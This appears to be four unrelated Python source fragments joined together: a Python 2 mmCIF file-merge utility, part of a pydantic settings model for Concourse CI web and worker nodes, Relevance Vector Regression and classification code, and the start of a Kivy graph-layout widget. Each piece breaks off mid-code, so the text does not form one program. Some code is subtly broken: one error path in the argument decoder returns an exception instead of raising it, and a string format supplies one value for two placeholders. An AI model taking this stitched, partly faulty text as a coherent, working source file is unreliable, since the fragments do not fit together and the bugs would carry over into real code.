self.log("%s: adding new table %s" % (
cif_table.data.file.path, cif_table.name))
else:
## fill the merge accelerator list and dictionary
## for the row merge
for crx in ctx:
accel = self.make_comare_accelerator(crx, columns)
self.merge_accel_list.append(accel)
num = 0
for cif_row in cif_table:
num += self.merge_cif_row(ctx, cif_row, columns)
self.log("%s: added %d rows into table %s" % (
cif_table.data.file.path, num, cif_table.name))
def merge_cif_data(self, cif_data):
"""Merge the cif_data block.
"""
## Before merging, remove any blank values from the cif_data
## block
self.remove_blank_values(cif_data)
## Before merging a cif_data block, it needs have tables
## with linked data fully filled in to avoid accidental
## data overlaps when merging with other files
self.add_parent_values(cif_data)
## Before merging a cif_data block, it must be scanned for
## tables with primary key conflicts with tables already in
## the merged files. Any primary keys which confict must be
## changed to a new value before the merge.
self.resolve_cif_data_conflicts(cif_data)
## merge the tables
for cif_table in cif_data:
columns = copy.deepcopy(cif_table.columns)
self.merge_cif_table(cif_table, columns)
## </merge utility methods>
## <API CALLS>
def merge_cif_file(self, cif_file, data_list = None):
"""Merge the cif_file. If a data_list is given, only merge
the data sections in the list, otherwise merge all data
sections in the cif_file.
"""
for cif_data in cif_file:
if data_list and cif_data.name not in data_list:
continue
self.merge_cif_data(cif_data)
def post_process(self):
"""Called after all cif_files have been merged, this method
post-processes the merged file.
"""
for cif_table in self.cif_data:
cif_table.autoset_columns()
self.sort_columns(cif_table)
## </API CALLS>
class UsageException(Exception):
def __init__(self, text):
self.text = text
def __str__(self):
return "Invalid Argument: %s" % (self.text)
def usage():
print 'cifmerge.py - A utility for intelligent merging and manipulation of'
print ' mmCIF files by utilizing linked data definitions'
print ' found in mmCIF dictionaries.'
print
print 'usage: cifmerge.py [-s "table.column=old:new"]'
print ' [-u "table.column=old:new"]'
print ' [-d mmCIF dictionary_filename]'
print ' [-f merge_filename]'
print ' [-n data_name]'
print ' OUTPUT_CIF_FILENAME'
print
print ' -h,-?'
print ' Prints this help page.'
print
print ' -s table.column=old:new'
print ' Changes the value of a row in table.column from old to'
print ' new, and then changes all linked child values of that'
print ' table.column according to the loaded mmCIF dictionaries.'
print
print ' -u table.column=old:new'
print ' Uber-alles value change. This reduces table to a one row'
print ' table with only the value new. If an old value is given,'
print ' any other columns of data in the row will be preserved.'
print ' All linked data items found in the mmCIF dictionaries'
print ' in the entire file are then changed to value new.'
print
print ' -d dictionary_filename'
print ' Specifies a mmCIF dictionary to use. Dictionaries are'
print ' necessary for the correct merging of tables with linked'
print ' values.'
print
print ' -f merge_filename'
print ' A mmCIF file to merge. Use multiple times to merge'
print ' multiple files.'
print
print ' -n name'
print ' Give the output mmCIF file data the argument name. If'
print ' no name is specified, XXXX is used.'
print
raise SystemExit
def decode_change_arg(change_arg):
"""Decodes the string:table.column=old:new into:(table, column, old, new).
"""
ieq = change_arg.find("=")
if ieq == -1:
return None
table_name_column = change_arg[:ieq].strip()
try:
table_name, column = table_name_column.split(".")
except ValueError:
raise UsageException(change_arg)
old_new = change_arg[ieq+1:].strip()
if old_new[0] == "'" or old_new[0] == '"':
quote = old_new[0]
else:
quote = None
if quote == None:
try:
old, new = old_new.split(":")
except ValueError:
return UsageException(change_arg)
old = old.strip()
new = new.strip()
else:
old_new = old_new[1:-1]
try:
old, new = old_new.split("%s:%s" % (quote))
except ValueError:
raise UsageException(change_arg)
return table_name, column, old, new
def main():
## parse options
(opts, args) = getopt.getopt(sys.argv[1:], "h?u:s:d:f:n:")
s_arg_list = []
u_arg_list = []
d_arg_list = []
f_arg_list = []
n_arg = None
output_file = None
for (opt, item) in opts:
if opt == "-h" or opt == "-?":
usage()
elif opt == "-s":
s_arg_list.append(decode_change_arg(item))
elif opt == "-u":
u_arg_list.append(decode_change_arg(item))
elif opt == "-d":
d_arg_list.append(item)
elif opt == "-f":
f_arg_list.append(item)
elif opt == "-n":
n_arg = item
if len(args) != 1:
raise UsageException("One ouput file path required.")
output_path = args[0]
## create validator and load dictionaries
validator = mmCIFValidator()
for path in d_arg_list:
sys.stderr.write("[LOADING DICTIONARY] %s\n" % (path))
validator.load_dictionary(path)
| |
key, used to sign auth tokens.",
)
streaming_artifacts_compression: Optional[str] = Field(
None,
concourse_env_var="CONCOURSE_STREAMING_ARTIFACTS_COMPRESSION",
description="Compression algorithm for internal streaming. (default: gzip)",
)
syslog_address: Optional[str] = Field(
None,
concourse_env_var="CONCOURSE_SYSLOG_ADDRESS",
description="Remote syslog server address with port (Example: 0.0.0.0:514).",
)
syslog_ca_cert: Optional[str] = Field(
None,
concourse_env_var="CONCOURSE_SYSLOG_CA_CERT",
description="Paths to PEM_encoded CA cert files to use to verify the Syslog server SSL cert.",
)
syslog_drain_interval: Optional[str] = Field(
None,
concourse_env_var="CONCOURSE_SYSLOG_DRAIN_INTERVAL",
description="Interval over which checking is done for new build logs to send to syslog server (duration measurement units are s/m/h; eg. 30s/30m/1h) (default: 30s)",
)
syslog_hostname: Optional[str] = Field(
None,
concourse_env_var="CONCOURSE_SYSLOG_HOSTNAME",
description="Client hostname with which the build logs will be sent to the syslog server. (default: atc_syslog_drainer)",
)
syslog_transport: Optional[str] = Field(
None,
concourse_env_var="CONCOURSE_SYSLOG_TRANSPORT",
description="Transport protocol for syslog messages (Currently supporting tcp, udp & tls).",
)
system_claim_key: Optional[str] = Field(
None,
concourse_env_var="CONCOURSE_SYSTEM_CLAIM_KEY",
description="The token claim key to use when matching system_claim_values (default: aud)",
)
system_claim_value: Optional[str] = Field(
None,
concourse_env_var="CONCOURSE_SYSTEM_CLAIM_VALUE",
description="Configure which token requests should be considered 'system' requests. (default: concourse_worker)",
)
tls_bind_port: Optional[str] = Field(
None,
concourse_env_var="CONCOURSE_TLS_BIND_PORT",
description="Port on which to listen for HTTPS traffic.",
)
tls_ca_cert: Optional[str] = Field(
None,
concourse_env_var="CONCOURSE_TLS_CA_CERT",
description="File containing the client CA certificate, enables mTLS",
)
tls_cert: Optional[str] = Field(
None,
concourse_env_var="CONCOURSE_TLS_CERT",
description="File containing an SSL certificate.",
)
tls_key: Optional[str] = Field(
None,
concourse_env_var="CONCOURSE_TLS_KEY",
description="File containing an RSA private key, used to encrypt HTTPS traffic.",
)
tracing_attribute: Optional[str] = Field(
None,
concourse_env_var="CONCOURSE_TRACING_ATTRIBUTE",
description="attributes to attach to traces as metadata",
)
tracing_honeycomb_api_key: Optional[str] = Field(
None,
concourse_env_var="CONCOURSE_TRACING_HONEYCOMB_API_KEY",
description="honeycomb.io api key",
)
tracing_honeycomb_dataset: Optional[str] = Field(
None,
concourse_env_var="CONCOURSE_TRACING_HONEYCOMB_DATASET",
description="honeycomb.io dataset name",
)
tracing_honeycomb_service_name: Optional[str] = Field(
None,
concourse_env_var="CONCOURSE_TRACING_HONEYCOMB_SERVICE_NAME",
description="honeycomb.io service name (default: concourse)",
)
tracing_jaeger_endpoint: Optional[str] = Field(
None,
concourse_env_var="CONCOURSE_TRACING_JAEGER_ENDPOINT",
description="jaeger http_based thrift collector",
)
tracing_jaeger_service: Optional[str] = Field(
None,
concourse_env_var="CONCOURSE_TRACING_JAEGER_SERVICE",
description="jaeger process service name (default: web)",
)
tracing_jaeger_tags: Optional[str] = Field(
None,
concourse_env_var="CONCOURSE_TRACING_JAEGER_TAGS",
description="tags to add to the components",
)
tracing_otlp_address: Optional[str] = Field(
None,
concourse_env_var="CONCOURSE_TRACING_OTLP_ADDRESS",
description="otlp address to send traces to",
)
tracing_otlp_header: Optional[str] = Field(
None,
concourse_env_var="CONCOURSE_TRACING_OTLP_HEADER",
description="headers to attach to each tracing message",
)
tracing_otlp_use_tls: Optional[bool] = Field(
None,
concourse_env_var="CONCOURSE_TRACING_OTLP_USE_TLS",
description="whether to use tls or not",
)
tracing_service_name: Optional[str] = Field(
None,
concourse_env_var="CONCOURSE_TRACING_SERVICE_NAME",
description="service name to attach to traces as metadata (default: concourse_web)",
)
tracing_stackdriver_projectid: Optional[str] = Field(
None,
concourse_env_var="CONCOURSE_TRACING_STACKDRIVER_PROJECTID",
description="GCP's Project ID",
)
tsa_atc_url: Optional[str] = Field(
None,
concourse_env_var="CONCOURSE_TSA_ATC_URL",
description="ATC API endpoints to which workers will be registered.",
)
tsa_authorized_keys: Optional[str] = Field(
None,
concourse_env_var="CONCOURSE_TSA_AUTHORIZED_KEYS",
description="Path to file containing keys to authorize, in SSH authorized_keys format (one public key per line).",
)
tsa_bind_ip: Optional[str] = Field(
None,
concourse_env_var="CONCOURSE_TSA_BIND_IP",
description="IP address on which to listen for SSH. (default: 0.0.0.0)",
)
tsa_bind_port: Optional[str] = Field(
None,
concourse_env_var="CONCOURSE_TSA_BIND_PORT",
description="Port on which to listen for SSH. (default: 2222)",
)
tsa_client_id: Optional[str] = Field(
None,
concourse_env_var="CONCOURSE_TSA_CLIENT_ID",
description="Client used to fetch a token from the auth server. NOTE: if you change this value you will also need to change the __system_claim_value flag so the atc knows to allow requests from this client. (default: concourse_worker)",
)
tsa_client_secret: Optional[str] = Field(
None,
concourse_env_var="CONCOURSE_TSA_CLIENT_SECRET",
description="Client used to fetch a token from the auth server",
)
tsa_cluster_name: Optional[str] = Field(
None,
concourse_env_var="CONCOURSE_TSA_CLUSTER_NAME",
description="A name for this Concourse cluster, to be displayed on the dashboard page.",
)
tsa_debug_bind_ip: Optional[str] = Field(
None,
concourse_env_var="CONCOURSE_TSA_DEBUG_BIND_IP",
description="IP address on which to listen for the pprof debugger endpoints. (default: 127.0.0.1)",
)
tsa_debug_bind_port: Optional[str] = Field(
None,
concourse_env_var="CONCOURSE_TSA_DEBUG_BIND_PORT",
description="Port on which to listen for the pprof debugger endpoints. (default: 2221)",
)
tsa_garden_request_timeout: Optional[str] = Field(
None,
concourse_env_var="CONCOURSE_TSA_GARDEN_REQUEST_TIMEOUT",
description="How long to wait for requests to Garden to complete. 0 means no timeout. (default: 5m)",
)
tsa_heartbeat_interval: Optional[str] = Field(
None,
concourse_env_var="CONCOURSE_TSA_HEARTBEAT_INTERVAL",
description="interval on which to heartbeat workers to the ATC (default: 30s)",
)
tsa_host_key: Optional[str] = None
tsa_host_key_path: Path = Field(
Path("/etc/concourse/tsa_host_key"),
concourse_env_var="CONCOURSE_TSA_HOST_KEY",
description="Path to private key to use for the SSH server.",
)
tsa_log_cluster_name: Optional[bool] = Field(
None,
concourse_env_var="CONCOURSE_TSA_LOG_CLUSTER_NAME",
description="Log cluster name.",
)
tsa_log_level: Optional[str] = Field(
None,
concourse_env_var="CONCOURSE_TSA_LOG_LEVEL",
description="Minimum level of logs to see. (default: info)",
)
tsa_peer_address: Optional[str] = Field(
None,
concourse_env_var="CONCOURSE_TSA_PEER_ADDRESS",
description="Network address of this web node, reachable by other web nodes. Used for forwarded worker addresses. (default: 127.0.0.1)",
)
tsa_scope: Optional[str] = Field(
None,
concourse_env_var="CONCOURSE_TSA_SCOPE",
description="Scopes to request from the auth server",
)
tsa_team_authorized_keys: Optional[Path] = Field(
None,
concourse_env_var="CONCOURSE_TSA_TEAM_AUTHORIZED_KEYS",
description="Path to file containing keys to authorize, in SSH authorized_keys format (one public key per line).",
)
tsa_team_authorized_keys_file: Optional[Path] = Field(
None,
concourse_env_var="CONCOURSE_TSA_TEAM_AUTHORIZED_KEYS_FILE",
description="Path to file containing a YAML array of teams and their authorized SSH keys, e.g. [{team:foo,ssh_keys:[key1,key2]}].",
)
tsa_token_url: Optional[str] = Field(
None,
concourse_env_var="CONCOURSE_TSA_TOKEN_URL",
description="Token endpoint of the auth server",
)
vault_auth_backend: Optional[str] = Field(
None,
concourse_env_var="CONCOURSE_VAULT_AUTH_BACKEND",
description="Auth backend to use for logging in to Vault.",
)
vault_auth_backend_max_ttl: Optional[str] = Field(
None,
concourse_env_var="CONCOURSE_VAULT_AUTH_BACKEND_MAX_TTL",
description="Time after which to force a re_login. If not set, the token will just be continuously renewed.",
)
vault_auth_param: Optional[str] = Field(
None,
concourse_env_var="CONCOURSE_VAULT_AUTH_PARAM",
description="Paramter to pass when logging in via the backend. Can be specified multiple times.",
)
vault_ca_cert: Optional[Path] = Field(
None,
concourse_env_var="CONCOURSE_VAULT_CA_CERT",
description="Path to a PEM_encoded CA cert file to use to verify the vault server SSL cert.",
)
vault_ca_path: Optional[Path] = Field(
None,
concourse_env_var="CONCOURSE_VAULT_CA_PATH",
description="Path to a directory of PEM_encoded CA cert files to verify the vault server SSL cert.",
)
vault_client_cert: Optional[Path] = Field(
None,
concourse_env_var="CONCOURSE_VAULT_CLIENT_CERT",
description="Path to the client certificate for Vault authorization.",
)
vault_client_key: Optional[Path] = Field(
None,
concourse_env_var="CONCOURSE_VAULT_CLIENT_KEY",
description="Path to the client private key for Vault authorization.",
)
vault_client_token: Optional[str] = Field(
None,
concourse_env_var="CONCOURSE_VAULT_CLIENT_TOKEN",
description="Client token for accessing secrets within the Vault server.",
)
vault_insecure_skip_verify: Optional[bool] = Field(
None,
concourse_env_var="CONCOURSE_VAULT_INSECURE_SKIP_VERIFY",
description="Enable insecure SSL verification.",
)
vault_login_timeout: Optional[str] = Field(
None,
concourse_env_var="CONCOURSE_VAULT_LOGIN_TIMEOUT",
description="Timeout value for Vault login. (default: 60s)",
)
vault_lookup_templates: Optional[str] = Field(
None,
concourse_env_var="CONCOURSE_VAULT_LOOKUP_TEMPLATES",
description="Path templates for credential lookup (default: /{{.Team}}/{{.Pipeline}}/{{.Secret}}, /{{.Team}}/{{.Secret}})",
)
vault_namespace: Optional[str] = Field(
None,
concourse_env_var="CONCOURSE_VAULT_NAMESPACE",
description="Vault namespace to use for authentication and secret lookup.",
)
vault_path_prefix: Optional[str] = Field(
None,
concourse_env_var="CONCOURSE_VAULT_PATH_PREFIX",
description="Path under which to namespace credential lookup. (default: /concourse)",
)
vault_query_timeout: Optional[str] = Field(
None,
concourse_env_var="CONCOURSE_VAULT_QUERY_TIMEOUT",
description="Timeout value for Vault query. (default: 60s)",
)
vault_retry_initial: Optional[str] = Field(
None,
concourse_env_var="CONCOURSE_VAULT_RETRY_INITIAL",
description="The initial time between retries when logging in or re_authing a secret. (default: 1s)",
)
vault_retry_max: Optional[str] = Field(
None,
concourse_env_var="CONCOURSE_VAULT_RETRY_MAX",
description="The maximum time between retries when logging in or re_authing a secret. (default: 5m)",
)
vault_server_name: Optional[str] = Field(
None,
concourse_env_var="CONCOURSE_VAULT_SERVER_NAME",
description="If set, is used to set the SNI host when connecting via TLS.",
)
vault_shared_path: Optional[str] = Field(
None,
concourse_env_var="CONCOURSE_VAULT_SHARED_PATH",
description="Path under which to lookup shared credentials.",
)
vault_url: Optional[str] = Field(
"https://active.vault.service.consul:8200",
concourse_env_var="CONCOURSE_VAULT_URL",
description="Vault server address used to access secrets.",
)
web_public_dir: Optional[str] = Field(
None,
concourse_env_var="CONCOURSE_WEB_PUBLIC_DIR",
description="Web public/ directory to serve live for local development.",
)
class Config: # noqa: WPS431
env_prefix = "concourse_web_"
arbitrary_types_allowed = True
@validator("encryption_key")
def validate_encryption_key_length(cls, encryption_key): # noqa: N805
if len(encryption_key) != CONCOURSE_ENCRYPTION_KEY_REQUIRED_LENGTH:
raise ValueError(
"Encryption key is not the correct length. "
"It needs to be a 32 byte random string."
)
return encryption_key
@property
def local_user(self):
password_value = self.admin_password.get_secret_value()
return f"{self.admin_user}:{password_value}"
def concourse_env(self) -> Dict[str, str]:
concourse_env_dict = super().concourse_env()
concourse_env_dict["CONCOURSE_ADD_LOCAL_USER"] = self.local_user
return concourse_env_dict
class ConcourseWorkerConfig(ConcourseBaseConfig):
_node_type: str = "worker"
user: str = "root"
baggageclaim_bind_ip: Optional[str] = Field(
None,
concourse_env_var="CONCOURSE_BAGGAGECLAIM_BIND_IP",
description="IP address on which to listen for API traffic. "
"(default: 127.0.0.1)",
)
baggageclaim_bind_port: Optional[int] = Field(
None,
concourse_env_var="CONCOURSE_BAGGAGECLAIM_BIND_PORT",
description="Port on which to listen for API traffic. (default: 7788)",
)
baggageclaim_btrfs_binary: Optional[Path] = Field(
None,
concourse_env_var="CONCOURSE_BAGGAGECLAIM_BTRFS_BIN",
description="Path to btrfs binary (default: btrfs)",
)
baggageclaim_debug_bind_ip: Optional[str] = Field(
None,
concourse_env_var="CONCOURSE_BAGGAGECLAIM_DEBUG_BIND_IP",
description="IP address on which to listen for the pprof debugger endpoints. "
"(default: 127.0.0.1)",
)
baggageclaim_debug_bind_port: Optional[int] = Field(
None,
concourse_env_var="CONCOURSE_BAGGAGECLAIM_DEBUG_BIND_PORT",
description="Port on which to listen for the pprof debugger endpoints. "
"(default: 7787)",
)
baggageclaim_disable_user_namespaces: Optional[bool] = Field(
None,
concourse_env_var="CONCOURSE_BAGGAGECLAIM_DISABLE_USER_NAMESPACES",
description="Disable remapping of user/group IDs in unprivileged volumes.",
)
baggageclaim_driver: Optional[str] | |
and Gaussian.
Parameters
----------
X: array-like of size (n_samples_test,n_features)
Matrix of explanatory variables
Returns
-------
probs: numpy array of size (n_samples_test,)
Estimated probabilities of target classes
'''
y_hat = self.decision_function(X)
X = check_array(X, accept_sparse=None, dtype = np.float64)
if self.normalize:
X = (X - self._x_mean) / self._x_std
if self.fit_intercept:
X = np.concatenate((np.ones([X.shape[0],1]), X),1)
if y_hat.ndim == 1:
pr = self._convo_approx(X[:,self.lambda_[0]!=np.PINF],
y_hat,self.sigma_[0])
prob = np.vstack([1 - pr, pr]).T
else:
pr = [self._convo_approx(X[:,idx != np.PINF],y_hat[:,i],
self.sigma_[i]) for i,idx in enumerate(self.lambda_) ]
pr = np.asarray(pr).T
prob = pr / np.reshape(np.sum(pr, axis = 1), (pr.shape[0],1))
return prob
def _convo_approx(self,X,y_hat,sigma):
''' Computes approximation to convolution of sigmoid and gaussian'''
var = np.sum(np.dot(X,sigma)*X,1)
ks = 1. / ( 1. + np.pi * var/ 8)**0.5
pr = expit(y_hat * ks)
return pr
def _sparsity_quality(self,X,Xa,y,B,A,Aa,active,Sn,cholesky):
'''
Calculates sparsity & quality parameters for each feature
'''
XB = X.T*B
bxx = np.dot(B,X**2)
Q = np.dot(X.T,y)
if cholesky:
# Here Sn is inverse of lower triangular matrix, obtained from
# cholesky decomposition
XBX = np.dot(XB,Xa)
XBX = np.dot(XBX,Sn,out=XBX)
S = bxx - np.sum(XBX**2,1)
else:
XSX = np.dot(np.dot(Xa,Sn),Xa.T)
S = bxx - np.sum( np.dot( XB,XSX )*XB,1 )
qi = np.copy(Q)
si = np.copy(S)
Qa,Sa = Q[active], S[active]
qi[active] = Aa * Qa / (Aa - Sa )
si[active] = Aa * Sa / (Aa - Sa )
return [si,qi,S,Q]
def _posterior_dist(self,X,y,A):
'''
Uses Laplace approximation for calculating posterior distribution
'''
f = lambda w: _logistic_cost_grad(X,y,w,A)
w_init = np.random.random(X.shape[1])
Mn = fmin_l_bfgs_b(f, x0 = w_init, pgtol = self.tol_solver,
maxiter = self.n_iter_solver)[0]
Xm = np.dot(X,Mn)
s = expit(Xm)
B = logistic._pdf(Xm) # avoids underflow
S = np.dot(X.T*B,X)
np.fill_diagonal(S, np.diag(S) + A)
t_hat = y - s
cholesky = True
# try using Cholesky , if it fails then fall back on pinvh
try:
R = np.linalg.cholesky(S)
Sn = solve_triangular(R,np.eye(A.shape[0]),
check_finite=False,lower=True)
except LinAlgError:
Sn = pinvh(S)
cholesky = False
return [Mn,Sn,B,t_hat,cholesky]
###############################################################################
# Relevance Vector Machine: RVR and RVC
###############################################################################
def get_kernel( X, Y, gamma, degree, coef0, kernel, kernel_params ):
'''
Calculates kernelised features for RVR and RVC
'''
if callable(kernel):
params = kernel_params or {}
else:
params = {"gamma": gamma,
"degree": degree,
"coef0": coef0 }
return pairwise_kernels(X, Y, metric=kernel,
filter_params=True, **params)
class RVR(RegressionARD):
'''
Relevance Vector Regression (Fast Version uses Sparse Bayesian Learning)
Parameters
----------
n_iter: int, optional (DEFAULT = 300)
Maximum number of iterations
fit_intercept : boolean, optional (DEFAULT = True)
whether to calculate the intercept for this model
tol: float, optional (DEFAULT = 1e-3)
If absolute change in precision parameter for weights is below tol
algorithm terminates.
copy_X : boolean, optional (DEFAULT = True)
If True, X will be copied; else, it may be overwritten.
verbose : boolean, optional (DEFAULT = True)
Verbose mode when fitting the model
kernel: str, optional (DEFAULT = 'poly')
Type of kernel to be used (all kernels: ['rbf' | 'poly' | 'sigmoid', 'linear']
degree : int, (DEFAULT = 3)
Degree for poly kernels. Ignored by other kernels.
gamma : float, optional (DEFAULT = 1/n_features)
Kernel coefficient for rbf and poly kernels, ignored by other kernels
coef0 : float, optional (DEFAULT = 1)
Independent term in poly and sigmoid kernels, ignored by other kernels
kernel_params : mapping of string to any, optional
Parameters (keyword arguments) and values for kernel passed as
callable object, ignored by other kernels
Attributes
----------
coef_ : array, shape = (n_features)
Coefficients of the regression model (mean of posterior distribution)
alpha_ : float
estimated precision of the noise
active_ : array, dtype = np.bool, shape = (n_features)
True for non-zero coefficients, False otherwise
lambda_ : array, shape = (n_features)
estimated precisions of the coefficients
sigma_ : array, shape = (n_features, n_features)
estimated covariance matrix of the weights, computed only
for non-zero coefficients
relevant_vectors_ : array
Relevant Vectors
References
----------
[1] Fast marginal likelihood maximisation for sparse Bayesian models (Tipping & Faul 2003)
(http://www.miketipping.com/papers/met-fastsbl.pdf)
[2] Analysis of sparse Bayesian learning (Tipping & Faul 2001)
(http://www.miketipping.com/abstracts.htm#Faul:NIPS01)
'''
def __init__(self, n_iter=300, tol = 1e-3, fit_intercept = True, copy_X = True,
verbose = False, kernel = 'poly', degree = 3, gamma = None,
coef0 = 1, kernel_params = None):
super(RVR,self).__init__(n_iter,tol,fit_intercept,copy_X,verbose)
self.kernel = kernel
self.degree = degree
self.gamma = gamma
self.coef0 = coef0
self.kernel_params = kernel_params
def fit(self,X,y):
'''
Fit Relevance Vector Regression Model
Parameters
-----------
X: {array-like,sparse matrix} of size (n_samples, n_features)
Training data, matrix of explanatory variables
y: array-like of size (n_samples, )
Target values
Returns
-------
self: object
self
'''
X,y = check_X_y(X,y,accept_sparse=['csr','coo','bsr'],dtype = np.float64)
# kernelise features
K = get_kernel( X, X, self.gamma, self.degree, self.coef0,
self.kernel, self.kernel_params)
# use fit method of RegressionARD
_ = super(RVR,self).fit(K,y)
# convert to csr (need to use __getitem__)
convert_tocsr = [scipy.sparse.coo.coo_matrix,
scipy.sparse.dia.dia_matrix,
scipy.sparse.bsr.bsr_matrix]
if type(X) in convert_tocsr:
X = X.tocsr()
self.relevant_ = np.where(self.active_== True)[0]
if X.ndim == 1:
self.relevant_vectors_ = X[self.relevant_]
else:
self.relevant_vectors_ = X[self.relevant_,:]
return self
def _decision_function(self,X):
''' Decision function '''
_, predict_vals = self._kernel_decision_function(X)
return predict_vals
def _kernel_decision_function(self,X):
''' Computes kernel and decision function based on kernel'''
check_is_fitted(self,'coef_')
X = check_array(X, accept_sparse=['csr', 'csc', 'coo'])
K = get_kernel( X, self.relevant_vectors_, self.gamma, self.degree,
self.coef0, self.kernel, self.kernel_params)
return K , np.dot(K,self.coef_[self.active_]) + self.intercept_
def predict_dist(self,X):
'''
Computes predictive distribution for test set. Predictive distribution
for each data point is one dimensional Gaussian and therefore is
characterised by mean and variance.
Parameters
----------
X: {array-like,sparse matrix} of size (n_samples_test, n_features)
Matrix of explanatory variables
Returns
-------
: list of length two [y_hat, var_hat]
y_hat: numpy array of size (n_samples_test,)
Estimated values of targets on test set (i.e. mean of predictive
distribution)
var_hat: numpy array of size (n_samples_test,)
Variance of predictive distribution
'''
# kernel matrix and mean of predictive distribution
K, y_hat = self._kernel_decision_function(X)
var_hat = 1./self.alpha_
var_hat += np.sum( np.dot(K,self.sigma_) * K, axis = 1)
return y_hat,var_hat
class RVC(ClassificationARD):
'''
Relevance Vector Classifier (Fast Version, uses Sparse Bayesian Learning )
Parameters
----------
n_iter: int, optional (DEFAULT = 100)
Maximum number of iterations before termination
tol: float, optional (DEFAULT = 1e-4)
If absolute change in precision parameter for weights is below tol, then
the algorithm terminates.
n_iter_solver: int, optional (DEFAULT = 15)
Maximum number of iterations before termination of solver
tol_solver: float, optional (DEFAULT = 1e-4)
Convergence threshold for solver (it is used in estimating posterior
distribution)
fit_intercept : bool, optional ( DEFAULT = True )
If True will use intercept in the model
verbose : boolean, optional (DEFAULT = True)
Verbose mode when fitting the model
kernel: str, optional (DEFAULT = 'rbf')
Type of kernel to be used (all kernels: ['rbf' | 'poly' | 'sigmoid']
degree : int, (DEFAULT = 3)
Degree for poly kernels. Ignored by other kernels.
gamma : float, optional (DEFAULT = 1/n_features)
Kernel coefficient for rbf and poly kernels, ignored by other kernels
coef0 : float, optional (DEFAULT = 0.1)
Independent term in poly and sigmoid kernels, ignored by other kernels
kernel_params : mapping of string to any, optional
Parameters (keyword arguments) and values for kernel passed as
callable object, ignored by other kernels
Attributes
----------
coef_ : array, shape = (n_features)
Coefficients of the model (mean of posterior distribution)
lambda_ : float
Estimated precisions of weights
active_ : array, dtype = np.bool, shape = (n_features)
True for non-zero coefficients, False otherwise
sigma_ : array, shape = (n_features, n_features)
Estimated covariance matrix of the weights, computed only for non-zero
coefficients
References
----------
[1] Fast marginal likelihood maximisation for sparse Bayesian models (Tipping & Faul 2003)
(http://www.miketipping.com/papers/met-fastsbl.pdf)
[2] Analysis of sparse Bayesian learning | |
<reponame>salt-die/graphvy<gh_stars>1-10
"""
Hold shift to drag-select vertices. Ctrl-click to select individual vertices, and again to pin them.
Space to pause/unpause the layout algorithm. Ctrl-Space to pause/unpause the Graph callback.
"""
from functools import wraps
from math import hypot
from random import random
import time
from kivy.clock import Clock
from kivy.graphics import Color, Ellipse, Line, Rectangle
from kivy.config import Config
from kivy.graphics.instructions import CanvasBase
from kivy.properties import OptionProperty, ObjectProperty
from kivy.uix.layout import Layout
from kivy.uix.widget import Widget
from kivy.core.window import Window
from kivymd.app import MDApp
import graph_tool as gt
from graph_tool.draw import random_layout, sfdp_layout
import numpy as np
from .convenience_classes import Node, Edge, Selection, SelectedSet, PinnedSet, GraphInterface
from .colormap import get_colormap
from ..constants import *
Config.set('input', 'mouse', 'mouse,multitouch_on_demand')
def erdos_random_graph(nodes, edges, prune=True):
G = gt.Graph()
G.add_vertex(nodes)
for _ in range(edges):
G.add_edge(0, 0)
gt.generation.random_rewire(G, model='erdos')
if prune:
G = gt.topology.extract_largest_component(G, directed=False, prune=True)
return G
def redraw_canvas_after(func):
"""For methods that change vertex coordinates."""
@wraps(func)
def wrapper(*args, **kwargs):
results = func(*args, **kwargs)
args[0].update_canvas()
return results
return wrapper
def limit(interval):
"""Limits how often a function can be called to once every interval seconds."""
def deco(func):
last_call = time.time()
@wraps(func)
def wrapper(*args, **kwargs):
now = time.time()
nonlocal last_call
if now - last_call > interval:
last_call = now
return func(*args, **kwargs)
return wrapper
return deco
class GraphCanvas(Widget):
"""
Dynamic graph layout widget. Layout updates as graph changes.
rule(G) should return a callable that updates G when called.
"""
tool = OptionProperty("Grab", options=TOOLS)
adjacency_list = ObjectProperty(None)
_mouse_pos_disabled = False
_selected = SelectedSet()
_pinned = PinnedSet()
_touches = []
_callback_paused = True
_layout_paused = False
delay = .3
console = None
def __init__(self, *args, G=None, rule=None, multigraph=False, **kwargs):
self.touch_down_dict = {'Grab': lambda touch=None: None,
'Select': self.select_touch_down,
'Pin': self.pin_touch_down,
'Show Path': lambda touch=None: None,
'Add Node': self.add_node_touch_down,
'Delete Node': self.delete_node_touch_down,
'Add Edge': self.add_edge_touch_down,
'Delete Edge': self.delete_edge_touch_down}
super().__init__(*args, **kwargs)
self.resize_event = Clock.schedule_once(lambda dt: None, 0) # Dummy event to save a conditional
self.load_graph(G) # Several attributes set/reset here
self.bind(size=self._delayed_resize, pos=self._delayed_resize,
tool=self.retool, adjacency_list=self.populate_adjacency_list)
Window.bind(mouse_pos=self.on_mouse_pos)
self.update_layout = Clock.schedule_interval(self.step_layout, UPDATE_INTERVAL)
self.load_rule(rule)
self.multigraph = multigraph
def load_graph(self, G=None, random=(50, 80)):
# Halt layout and graph_rule
if (layout_needs_unpause := hasattr(self, 'update_layout') and not self._layout_paused):
self.pause_layout()
if (callback_needs_unpause := hasattr(self, 'rule_callback') and not self._callback_paused):
self.pause_callback()
# Setup interface
none_attrs = ['_highlighted', 'edges', 'nodes', 'background_color', '_background', 'select_rect',
'_edge_instructions', '_node_instructions', '_source_color', '_source_circle', 'coords',
'_source', 'rule_callback']
self.__dict__.update(dict.fromkeys(none_attrs))
self.offset_x = .25
self.offset_y = .25
self.scale = .5
if G is None:
self.G = GraphInterface(self, erdos_random_graph(*random)) if random else GraphInterface(self)
elif isinstance(G, str):
self.G = GraphInterface(self, gt.load_graph(G, fmt='gt'))
else:
self.G = GraphInterface(self, G)
self.G.set_fast_edge_removal()
if self.console is not None:
self.console.console.locals['G'] = self.G
if 'pos' not in self.G.vp:
self.G.vp.pos = random_layout(self.G, (1, 1))
self.G.vp.pinned = self.G.new_vertex_property('bool')
self.set_node_colormap(update=False)
self.set_edge_colormap(update=False)
self.setup_canvas()
self.update_canvas()
self.populate_adjacency_list()
# Resume layout and graph rule
if layout_needs_unpause:
self.pause_layout()
if getattr(self, 'rule', None):
self.load_rule(self.rule)
if callback_needs_unpause:
self.pause_callback()
def populate_adjacency_list(self, *args):
if self.adjacency_list is None:
return
self.adjacency_list.clear_widgets()
for node in self.nodes.values():
node.make_list_item(self.adjacency_list)
def set_node_colormap(self, property_=None, states=1, end=None, update=True):
if property_ is None:
self.node_colors = self.G.vp.default = self.G.new_vertex_property('bool')
else:
self.node_colors = property_
self.node_colormap = get_colormap(states=states, end=end, for_nodes=True)
if update:
self.update_canvas()
def set_edge_colormap(self, property_=None, states=1, end=None, update=True):
if property_ is None:
self.edge_colors = self.G.ep.default = self.G.new_edge_property('bool')
else:
